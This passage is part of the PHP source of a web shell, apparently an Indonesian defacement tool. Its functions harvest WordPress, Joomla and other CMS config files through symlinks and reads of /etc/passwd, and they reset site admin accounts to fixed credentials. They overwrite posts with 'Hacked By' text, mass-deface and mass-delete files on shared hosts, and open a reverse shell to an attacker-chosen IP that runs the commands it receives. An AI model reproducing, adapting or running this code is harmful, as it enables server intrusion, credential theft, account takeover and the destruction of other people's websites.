711. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
712. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
713. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
714. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
715. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
716. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
717. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
718. $data = curl_exec($ch);
719. curl_close($ch);
720. return $data;
721. }
722. $link = explode("\r\n", $_POST['link']);
723. $user = "7atim";
724. $pass = "7atim";
725. $passx = md5($pass);
726. foreach($link as $dir_config) {
727. $config = anucurl($dir_config);
728. $dbhost = ambilkata($config,"DB_HOST', '","'");
729. $dbuser = ambilkata($config,"DB_USER', '","'");
730. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
731. $dbname = ambilkata($config,"DB_NAME', '","'");
732. $dbprefix = ambilkata($config,"table_prefix = '","'");
733. $prefix = $dbprefix."users";
734. $option = $dbprefix."options";
735. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
736. $db = mysql_select_db($dbname);
737. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
738. $result = mysql_fetch_array($q);
739. $id = $result[ID];
740. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
741. $result2 = mysql_fetch_array($q2);
742. $target = $result2[option_value];
743. if($target == '') {
744. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
745. } else {
746. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
747. }
748. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
749. if(!$conn OR !$db OR !$update) {
750. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
751. mysql_close($conn);
752. } else {
753. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><form target='_blank' method='post' action='$target/wp-login.php'>
754. <input type='hidden' name='log' value='7atim' />
755. <input type='hidden' name='pwd' value='7atim' />
756. <input type='submit' value='Log In'></form><br>";
757. echo "[+] username: <font color=lime>$user</font><br>";
758. echo "[+] password: <font color=lime>$pass</font><br><br>";
759.  
760. mysql_close($conn);
761. }
762. }
763. }
764.  
765. }
766. elseif($_GET['do'] == 'auto_cu_joomla') {
767. if($_POST['gass']) {
768. echo "<center><h1>Joomla Auto Change User 2</h1>
769. <form method='post'>
770. Link Config: <br>
771. <textarea name='link' style='width: 450px; height:250px;'>";
772. UrlLoop($_POST['linkconf'],'joomla');
773. echo"</textarea><br>
774. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
775. </form></center>";
776. } else {
777. echo "<center><h1>Joomla Auto Change User 2</h1>
778. <form method='post'>
779. Link Config: <br>
780. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/0xsym/'><br>
781. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
782. </form></center>";
783. }
784. if($_POST['auto_cu_joomla']) {
785.  
786. function anucurl($sites) {
787. $ch = curl_init($sites);
788. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
789. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
790. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
791. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
792. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
793. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
794. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
795. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
796. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
797. $data = curl_exec($ch);
798. curl_close($ch);
799. return $data;
800. }
801. $link = explode("\r\n", $_POST['link']);
802. $user = "7atim";
803. $pass = "7atim";
804. $passx = md5($pass);
805. foreach($link as $dir_config) {
806. $config = anucurl($dir_config);
807. $dbhost = ambilkata($config,"host = '","'");
808. $dbuser = ambilkata($config,"user = '","'");
809. $dbpass = ambilkata($config,"password = '","'");
810. $dbname = ambilkata($config,"db = '","'");
811. $dbprefix = ambilkata($config,"dbprefix = '","'");
812. $prefix = $dbprefix."users";
813. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
814. $db = mysql_select_db($dbname);
815. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
816. $result = mysql_fetch_array($q);
817. $id = $result['id'];
818. $site = ambilkata($config,"sitename = '","'");
819. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
820. echo "Config => ".$dir_config."<br>";
821. echo "CMS => Joomla<br>";
822. if($site == '') {
823. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
824. } else {
825. echo "Sitename => $site<br>";
826. }
827. if(!$update OR !$conn OR !$db) {
828. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
829. } else {
830. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
831. }
832. mysql_close($conn);
833. }
834. }
835. }
836. elseif($_GET['do'] == 'symlink') {
837.  
838. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
839. $d0mains = @file("/etc/named.conf");
840. ##httaces
841. if($d0mains){
842. @mkdir("0xsymlink",0777);
843. @chdir("0xsymlink");
844. @exe("ln -s / root");
845. $file3 = 'Options Indexes FollowSymLinks
846. DirectoryIndex jancox.htm
847. AddType text/plain .php
848. AddHandler text/plain .php
849. Satisfy Any';
850. $fp3 = fopen('.htaccess','w');
851. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
852. echo "
853. <table align=center border=1 style='width:60%;border-color:#333333;'>
854. <tr>
855. <td align=center><font size=2>S. No.</font></td>
856. <td align=center><font size=2>Domains</font></td>
857. <td align=center><font size=2>Users</font></td>
858. <td align=center><font size=2>Symlink</font></td>
859. </tr>";
860. $dcount = 1;
861. foreach($d0mains as $d0main){
862. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
863. flush();
864. if(strlen(trim($domains[1][0])) > 2){
865. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
866. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
867. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
868. <td>".$user['name']."</td>
869. <td><a href='$full/0xsymlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
870. flush();
871. $dcount++;}}}
872. echo "</table>";
873. }else{
874. $TEST=@file('/etc/passwd');
875. if ($TEST){
876. @mkdir("0xsymlink",0777);
877. @chdir("0xsymlink");
878. exe("ln -s / root");
879. $file3 = 'Options Indexes FollowSymLinks
880. DirectoryIndex jancox.htm
881. AddType text/plain .php
882. AddHandler text/plain .php
883. Satisfy Any';
884. $fp3 = fopen('.htaccess','w');
885. $fw3 = fwrite($fp3,$file3);
886. @fclose($fp3);
887. echo "
888. <table align=center border=1><tr>
889. <td align=center><font size=3>S. No.</font></td>
890. <td align=center><font size=3>Users</font></td>
891. <td align=center><font size=3>Symlink</font></td></tr>";
892. $dcount = 1;
893. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
894. while(!feof($file)){
895. $s = fgets($file);
896. $matches = array();
897. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
898. $matches = str_replace("home/","",$matches[1]);
899. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
900. continue;
901. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
902. <td align=center><font class=txt>" . $matches . "</td>";
903. echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
904. $dcount++;}fclose($file);
905. echo "</table>";}else{if($os != "Windows"){@mkdir("0xsymlink",0777);@chdir("0xsymlink");@exe("ln -s / root");$file3 = '
906. Options Indexes FollowSymLinks
907. DirectoryIndex jancox.htm
908. AddType text/plain .php
909. AddHandler text/plain .php
910. Satisfy Any
911. ';
912. $fp3 = fopen('.htaccess','w');
913. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
914. echo "
915. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
916. <table align=center border=1><tr>
917. <td align=center><font size=3>ID</font></td>
918. <td align=center><font size=3>Users</font></td>
919. <td align=center><font size=3>Symlink</font></td></tr>";
920. $temp = "";$val1 = 0;$val2 = 1000;
921. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
922. if ($uid)$temp .= join(':',$uid)."\n";}
923. echo '<br/>';$temp = trim($temp);$file5 =
924. fopen("test.txt","w");
925. fputs($file5,$temp);
926. fclose($file5);$dcount = 1;$file =
927. fopen("test.txt", "r") or exit("Unable to open file!");
928. while(!feof($file)){$s = fgets($file);$matches = array();
929. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
930. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
931. continue;
932. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
933. <td align=center><font class=txt>" . $matches . "</td>";
934. echo "<td align=center><font class=txt><a href=$full/0xsymlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
935. $dcount++;}
936. fclose($file);
937. echo "</table></div></center>";unlink("test.txt");
938. } else
939. echo "<center><font size=3>Cannot create Symlink</font></center>";
940. }
941. }
942. }
943. elseif($_GET['do'] == 'config') {
944. if($_POST){ if($_POST['tipe'] == 'grabsymv') {
945. @mkdir("0xsymv", 0777);
946. exe("ln -s / 0xsymv/root");
947. $htaccess="Options Indexes FollowSymLinks
948. DirectoryIndex jancox.htm
949. AddType text/plain .php
950. AddHandler text/plain .php
951. Satisfy Any";
952. @file_put_contents("0xsymv/.htaccess",$htaccess);
953. $etc_passwd=$_POST['passwd'];
954.  
955. $etc_passwd=explode("\n",$etc_passwd);
956. foreach($etc_passwd as $passwd){
957. $pawd=explode(":",$passwd);
958. $user =$pawd[5];
959. $usera = preg_replace('/\/var\/www\/vhosts\//', '', $user);
960. if (preg_match('/vhosts/i',$user)){
961. exe("ln -s ".$user."/httpdocs/wp-config.php 0xsymv/".$usera."-Wordpress.txt");
962. exe("ln -s ".$user."/httpdocs/configuration.php 0xsymv/".$usera."-Joomla.txt");
963. exe("ln -s ".$user."/httpdocs/config/koneksi.php 0xsymv/".$usera."-Lokomedia.txt");
964. exe("ln -s ".$user."/httpdocs/forum/config.php 0xsymv/".$usera."-phpBB.txt");
965. exe("ln -s ".$user."/httpdocs/sites/default/settings.php 0xsymv/".$usera."-Drupal.txt");
966. exe("ln -s ".$user."/httpdocs/config/settings.inc.php 0xsymv/".$usera."-PrestaShop.txt");
967. exe("ln -s ".$user."/httpdocs/app/etc/local.xml 0xsymv/".$usera."-Magento.txt");
968. exe("ln -s ".$user."/httpdocs/admin/config.php 0xsymv/".$usera."-OpenCart.txt");
969. exe("ln -s ".$user."/httpdocs/application/config/database.php 0xsymv/".$usera."-Ellislab.txt");
970. }}}
971. if($_POST['tipe'] == 'grabsym') {
972. @mkdir("0xsym", 0777);
973. @symlink("/","0xsym/root");
974. $htaccess="Options Indexes FollowSymLinks
975. DirectoryIndex jancox.htm
976. AddType text/plain .php
977. AddHandler text/plain .php
978. Satisfy Any";
979. @file_put_contents("0xsym/.htaccess",$htaccess);}
980. if($_POST['tipe'] == 'grabsym404') {
981. @mkdir("0xsym404", 0777);
982. @symlink("/","0xsym404/root");
983. $htaccess="Options Indexes FollowSymLinks
984. DirectoryIndex jancox.htm
985. AddType text/plain .php
986. AddHandler text/plain .php
987. Satisfy Any";
988. @file_put_contents("0xsym404/.htaccess",$htaccess);}
989. if($_POST['tipe'] == 'grab') {
990. mkdir("0xgrab", 0777);
991. $isi_htc = "Options all\nRequire None\nSatisfy Any";
992. $htc = fopen("0xgrab/.htaccess","w");
993. fwrite($htc, $isi_htc);
994. }
995. $passwd = $_POST['passwd'];
996.  
997. preg_match_all('/(.*?):x:/', $passwd, $user_config);
998. foreach($user_config[1] as $user_cox) {
999. $grab_config = array(
1000. "/home/$user_cox/public_html/wp-config.php" => "Wordpress",
1001. "/home/$user_cox/public_html/configuration.php" => "Joomla",
1002. "/home/$user_cox/.accesshash" => "WHM-accesshash",
1003. "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
1004. "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
1005. "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
1006. "/home/$user_cox/public_html/forum/config.php" => "phpBB",
1007. "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
1008. "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
1009. "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
1010. "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
1011. "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",
1012. "/home/$user_cox/public_html/whm/configuration.ph-p" => "WHMCS"
1013. );
1014.  
1015. foreach($grab_config as $config => $nama_config) {
1016. if($_POST['tipe'] == 'grab') {
1017. $ambil_config = file_get_contents($config);
1018. if($ambil_config == '') {
1019. } else {
1020. $file_config = fopen("0xgrab/$user_cox-$nama_config.txt","w");
1021. fputs($file_config,$ambil_config);
1022. }
1023. }
1024. if($_POST['tipe'] == 'grabsym') {
1025. @symlink($config,"0xsym/".$user_cox."-".$nama_config.".txt");
1026. }
1027. if($_POST['tipe'] == 'grabsym404') {
1028. $sym404=symlink($config,"0xsym404/".$user_cox."-".$nama_config.".txtz");
1029. if($sym404){
1030. @mkdir("0xsym404/".$user_cox."-".$nama_config.".tx", 0777);
1031. $xsym404="Options Indexes FollowSymLinks
1032. DirectoryIndex jancox.htm
1033. ReadmeName 0x.txt
1034. Satisfy Any";
1035. @file_put_contents("0xsym404/".$user_cox."-".$nama_config.".tx/.htaccess",$xsym404);
1036. @symlink($config,"0xsym404/".$user_cox."-".$nama_config.".tx/0x.txt");
1037.  
1038. }
1039. }
1040.  
1041. }
1042. } if($_POST['tipe'] == 'grab') {
1043. echo "<center><a href='?dir=$dir/0xgrab'><font color=lime>Done</font></a></center>";
1044. } if($_POST['tipe'] == 'grabsym') {
1045. echo "<center>
1046. <a href=\"0xsym/root/\">Root Server</a>
1047. <br><a href=\"0xsym/\">Configurations</a></center>";
1048. }if($_POST['tipe'] == 'grabsymv') {
1049. echo "<center>
1050. <a href=\"0xsymv/root/\">Root Server</a>
1051. <br><a href=\"0xsymv/\">Configurations</a></center>";
1052. }
1053.  
1054.  
1055. }else{
1056. echo "<form method=\"post\" action=\"\"><center> <select class=\"select\" name=\"tipe\" style=\"width: 450px;\" height=\"10\">
1057. <option value=\"grab\">Config Grab</option>
1058. <option value=\"grabsym\">Symlink Config</option>
1059. <option value=\"grabsym404\">Symlink Config 404</option>
1060. <option value=\"grabsymv\">VHosts Symlink Config</option>
1061. </center></select><br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
1062. echo file_get_contents('/etc/passwd');
1063. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";}
1064.  
1065.  
1066. }
1067. elseif($_GET['do'] == 'jump') {
1068. $i = 0;
1069. echo "<pre><div class='margin: 5px auto;'>";
1070. $etc = fopen("/etc/passwd", "r");
1071. while($passwd = fgets($etc)) {
1072. if($passwd == '' || !$etc) {
1073. echo "<font color=red>Can't read /etc/passwd</font>";
1074. } else {
1075. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
1076. foreach($user_jumping[1] as $userjum) {
1077. $userjumdir = "/home/$userjum/public_html";
1078. if(is_readable($userjumdir)) {
1079. $i++;
1080. $jrw = "[<font color=lime>R</font>] <a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a><br>";
1081. if(is_writable($userjumdir)) {
1082. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$userjumdir'><font color=gold>$userjumdir</font></a><br>";
1083. }
1084. echo $jrw;
1085. }
1086. }
1087. }
1088. }
1089. if($i == 0) {
1090. } else {
1091. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
1092. }
1093. echo "</div></pre>";
1094. }
1095. elseif($_GET['do'] == 'asu') {
1096.  
1097. if($_POST['gass']) {
1098. echo "<center><h1>WordPress Auto Change User 2</h1>
1099. <form method='post'>
1100. Link Config: <br>
1101. <textarea name='link' style='width: 450px; height:250px;'>";
1102. UrlLoop($_POST['linkconf'],'wordpress');
1103. echo"</textarea><br>
1104. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
1105. </form></center>";
1106. } else {
1107. echo "<center><h1>WordPress Auto Change User 2</h1>
1108. <form method='post'>
1109. Link Config: <br>
1110. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/0xsym/'><br>
1111. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
1112. </form></center>";
1113. }
1114. if($_POST['auto_cu_wp']) {
1115.  
1116. function anucurl($sites) {
1117. $ch = curl_init($sites);
1118. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1119. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1120. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1121. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1122. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1123. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1124. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1125. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1126. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1127. $data = curl_exec($ch);
1128. curl_close($ch);
1129. return $data;
1130. }
1131. $script = $title;
1132. $link = explode("\r\n", $_POST['link']);
1133. foreach($link as $dir_config) {
1134. $title = "Hacked By 7atim | Indonesian Code Party";
1135. $dbhost = ambilkata($config,"DB_HOST', '","'");
1136. $dbuser = ambilkata($config,"DB_USER', '","'");
1137. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1138. $dbname = ambilkata($config,"DB_NAME', '","'");
1139. $dbprefix = ambilkata($config,"table_prefix = '","'");
1140. $prefix = $dbprefix."posts";
1141. $option = $dbprefix."options";
1142. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1143. $db = mysql_select_db($dbname);
1144. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1145. $result = mysql_fetch_array($q);
1146. $id = $result[ID];
1147. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1148. $result2 = mysql_fetch_array($q2);
1149. $target = $result2[option_value];
1150. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1151. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1152. echo "<div style='margin: 5px auto;'>";
1153. if($target == '') {
1154. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
1155. } else {
1156. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1157. }
1158. if(!$update OR !$conn OR !$db) {
1159. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
1160. } else {
1161. echo "<font color=lime>sukses di ganti.</font><br>";
1162. }
1163. echo "</div>";
1164. mysql_close($conn);
1165. }
1166. }
1167.  
1168.  
1169. }
1170. elseif($_GET['do'] == 'mass_deface') {
1171. echo "<center><form action=\"\" method=\"post\">\n";
1172. $dirr=$_POST['d_dir'];
1173. $index = $_POST["script"];
1174. $index = str_replace('"',"'",$index);
1175. $index = stripslashes($index);
1176. function edit_file($file,$index){
1177. if (is_writable($file)) {
1178. clear_fill($file,$index);
1179. echo "<Span style='color:green;'><strong> [+] Nyabun 100% Successfull </strong></span><br></center>";
1180. }
1181. else {
1182. echo "<Span style='color:red;'><strong> [-] Ternyata Tidak Boleh Menyabun Disini :( </strong></span><br></center>";
1183. }
1184. }
1185. function hapus_massal($dir,$namafile) {
1186. if(is_writable($dir)) {
1187. $dira = scandir($dir);
1188. foreach($dira as $dirb) {
1189. $dirc = "$dir/$dirb";
1190. $lokasi = $dirc.'/'.$namafile;
1191. if($dirb === '.') {
1192. if(file_exists("$dir/$namafile")) {
1193. unlink("$dir/$namafile");
1194. }
1195. } elseif($dirb === '..') {
1196. if(file_exists("".dirname($dir)."/$namafile")) {
1197. unlink("".dirname($dir)."/$namafile");
1198. }
1199. } else {
1200. if(is_dir($dirc)) {
1201. if(is_writable($dirc)) {
1202. if(file_exists($lokasi)) {
1203. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
1204. unlink($lokasi);
1205. $idx = hapus_massal($dirc,$namafile);
1206. }
1207. }
1208. }
1209. }
1210. }
1211. }
1212. }
1213. function clear_fill($file,$index){
1214. if(file_exists($file)){
1215. $handle = fopen($file,'w');
1216. fwrite($handle,'');
1217. fwrite($handle,$index);
1218. fclose($handle); } }
1219.  
1220. function gass(){
1221. global $dirr , $index ;
1222. chdir($dirr);
1223. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
1224. $files = scandir($dirr) ;
1225. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
1226. sort($files);
1227. $n = 0 ;
1228. foreach ($files as $file){
1229. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
1230. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
1231. edit_file($file,$index);
1232. flush();
1233. $n = $n +1 ;
1234. }
1235. }
1236. echo "<br>";
1237. echo "<center><br><h3>$n Kali Anda Telah Ngecrot Disini </h3></center><br>";
1238. }
1239. function ListFiles($dirrall) {
1240.  
1241. if($dh = opendir($dirrall)) {
1242.  
1243. $files = Array();
1244. $inner_files = Array();
1245. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
1246. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
1247. while($file = readdir($dh)) {
1248. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
1249. if(is_dir($dirrall . "/" . $file)) {
1250. $inner_files = ListFiles($dirrall . "/" . $file);
1251. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
1252. } else {
1253. array_push($files, $dirrall . "/" . $file);
1254. }
1255. }
1256. }
1257.  
1258. closedir($dh);
1259. return $files;
1260. }
1261. }
1262. function gass_all(){
1263. global $index ;
1264. $dirrall=$_POST['d_dir'];
1265. foreach (ListFiles($dirrall) as $key=>$file){
1266. $file = str_replace('//',"/",$file);
1267. echo "<center><strong>$file</strong> ===>";
1268. edit_file($file,$index);
1269. flush();
1270. }
1271. $key = $key+1;
1272. echo "<center><br><h3>$key Kali Anda Telah Ngecrot Disini </h3></center><br>"; }
1273. function sabun_massal($dir,$namafile,$isi_script) {
1274. if(is_writable($dir)) {
1275. $dira = scandir($dir);
1276. foreach($dira as $dirb) {
1277. $dirc = "$dir/$dirb";
1278. $lokasi = $dirc.'/'.$namafile;
1279. if($dirb === '.') {
1280. file_put_contents($lokasi, $isi_script);
1281. } elseif($dirb === '..') {
1282. file_put_contents($lokasi, $isi_script);
1283. } else {
1284. if(is_dir($dirc)) {
1285. if(is_writable($dirc)) {
1286. echo "[<font color=lime>DONE</font>] $lokasi<br>";
1287. file_put_contents($lokasi, $isi_script);
1288. $idx = sabun_massal($dirc,$namafile,$isi_script);
1289. }
1290. }
1291. }
1292. }
1293. }
1294. }
1295. if($_POST['mass'] == 'onedir') {
1296. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
1297. $ini="http://";
1298. $mainpath=$_POST[d_dir];
1299. $file=$_POST[d_file];
1300. $dir=opendir("$mainpath");
1301. $code=base64_encode($_POST[script]);
1302. $indx=base64_decode($code);
1303. while($row=readdir($dir)){
1304. $start=@fopen("$row/$file","w+");
1305. $finish=@fwrite($start,$indx);
1306. if ($finish){
1307. echo"$ini$row/$file\n";
1308. }
1309. }
1310. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
1311. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
1312. $dir=opendir("$mainpath");
1313. $code=base64_encode($_POST[script]);
1314. $indx=base64_decode($code);
1315. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
1316. $finish=@fwrite($start,$indx);
1317. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
1318. }
1319.  
1320. }
1321. elseif($_POST['mass'] == 'sabunkabeh') { gass(); }
1322. elseif($_POST['mass'] == 'hapusmassal') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
1323. elseif($_POST['mass'] == 'sabunmematikan') { gass_all(); }
1324. elseif($_POST['mass'] == 'massdeface') {
1325. echo "<div style='margin: 5px auto; padding: 5px'>";
1326. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
1327. echo "</div>"; }
1328. else {
1329. echo "
1330. <center><font style='text-decoration: underline;'>
1331. Select Type:<br>
1332. </font>
1333. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
1334. <option value=\"onedir\">Mass Deface 1 Dir</option>
1335. <option value=\"massdeface\">Mass Deface ALL Dir</option>
1336. <option value=\"sabunkabeh\">Sabun Massal Di Tempat</option>
1337. <option value=\"sabunmematikan\">Sabun Massal Bunuh Diri</option>
1338. <option value=\"hapusmassal\">Mass Delete Files</option></center></select><br>
1339. <font style='text-decoration: underline;'>Folder:</font><br>
1340. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
1341. <font style='text-decoration: underline;'>Filename:</font><br>
1342. <input type='text' name='d_file' value='0x.php' style='width: 450px;' height='10'><br>
1343. <font style='text-decoration: underline;'>Index File:</font><br>
1344. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By 7atim</textarea><br>
1345. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
1346. </form></center>";
1347. }
1348. }
1349. elseif(strstr($CurrentUrl, "YmNrbmV0")){
1350.  
1351. echo '
1352. <div id="back">
1353. <h2>Back Connect</h2>
1354. <p>Back connect will allow you to enter system commands remotely.</p>
1355. <p>
1356. <table>
1357. <form action="" method="post">
1358. <tr class="optionstr"><td>IP Address: </td><td><input type="textbox" name="ip" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
1359. <tr class="optionstr"><td>Port: </td><td><input type="textbox" name="port" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
1360. <tr class="optionstr"><td><input type="submit" name="bind" value="Open Connection" style="border:1px solid #5C7296; color: #5C7296;background-color:#1d1d1d;font-size:13px;"></td></tr>
1361. </form>
1362. </table>';
1363. if(isset($_POST['bind']))
1364. {
1365. echo "<p>Attempting Connection...</p>";
1366. $ip = $_POST['ip'];
1367. $port= $_POST['port'];
1368. $sockfd=fsockopen($ip , $port , $errno, $errstr );
1369. if($errno != 0){echo "<font color='red'>$errno : $errstr</font>";}else if (!$sockfd) {$result = "<p>Unexpected error has occured, connection may have failed.</p>";} else {fputs ($sockfd ,"\n{################################################################}\n..:: G6 W3b Sh3ll v1.1- Coded By Mr. P-teo ::..\n\n=> Backconnect \n=> Back \n
1370. \n{################################################################}"); $dir = shell_exec("pwd"); $sysinfo = shell_exec("uname -a"); $time = Shell_exec("time"); $len = 1337; fputs($sockfd, "User ", $sysinfo, "connected @ ", $time, "\n\n"); while(!feof($sockfd)){ $cmdPrompt = '[G6]#:> ';fputs ($sockfd , $cmdPrompt );$command= fgets($sockfd, $len);
1371. fputs($sockfd , "\n" . shell_exec($command) . "\n\n"); } fclose($sockfd);}}
1372. echo "</p></div>";
1373.  
1374. }elseif($_GET['act'] == 'edit') {
1375.  
1376. if(isset($_POST['save'])){
1377. $file = $_POST['saveas'];
1378. $content = magicboom($_POST['content']);
1379. if($filez = @fopen($file,"w")){
1380. $time = date("d-M-Y H:i",time());
1381. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
1382. else $msg = "failed to save";
1383. @fclose($filez);
1384. }
1385. else $msg = "permission denied";
1386. }
